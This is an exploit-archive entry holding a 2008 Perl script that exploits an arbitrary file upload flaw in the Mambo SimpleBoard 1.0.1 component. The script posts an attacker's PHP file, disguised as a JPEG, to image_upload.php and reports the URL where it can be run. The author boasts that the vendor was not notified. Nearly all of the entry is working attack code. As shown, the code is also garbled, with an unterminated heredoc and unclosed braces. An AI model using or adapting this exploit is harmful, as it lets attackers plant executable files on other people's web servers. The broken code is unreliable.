Mambo Component SimpleBoard 1.0.1 - Arbitrary File Upload

ID EXPLOITPACK:A07C0B379E6636230BE43B63B00D2894
Type exploitpack
Reporter t0pP8uZz
Modified 2008-10-29T00:00:00


Mambo Component SimpleBoard 1.0.1 - Arbitrary File Upload


use warnings;
use strict;
use LWP::UserAgent;
use HTTP::Request::Common;

my $fname = rand(99999) . ".php"; # no int()

print <<INTRO;

- SimpleBoard Mambo Component <= 1.0.1 -
- Remote Arbitrary File Upload Exploit -
    Discovered && Coded by: t0pP8uZz
    Discovered on: 20 October 2008
    Vendor has not been notified!
        This exploit is a completely diffrent
            method then the prior simpleboard vulns.
            which differs from the one
            located here:
        Same files vulnerable, But this one works with
            the patch! in later versions of
            SimpleBoard they removed the image_upload.php so
            this wont work. but this
            works on every image_upload.php version. with the
            patch in place!
        A common error for the exploit is if openbase_dir is
            enabled, then this means
            the file will not get uploaded due to the
            dir restrictions.
    - Peace
    - #sectalk


print "\nEnter URL(ie: ";
    chomp(my $url=<STDIN>);
print "\nEnter File Path(path to local file to upload): ";
    chomp(my $file=<STDIN>);

my $ua = LWP::UserAgent->new;
my $re = $ua->request(POST $url.'/components/com_simpleboard/image_upload.php',
                      Content_Type => 'form-data',
                      Content      => [ attachimage => [ $file, $fname, Content_Type => 'image/jpeg' ], ] );

die "HTTP POST Failed!" unless $re->is_success;

if($re->content =~ /open_basedir/) {
    print "open_basedir restriction enabled. Exploit failed. See php.ini for more details.\n"; # say() ? get perl510
else {
    print "Looks like exploit was successfull! for uploaded file check:  " . $url . "/components/com_simpleboard/" . $fname . "\n";   

# [2008-10-29]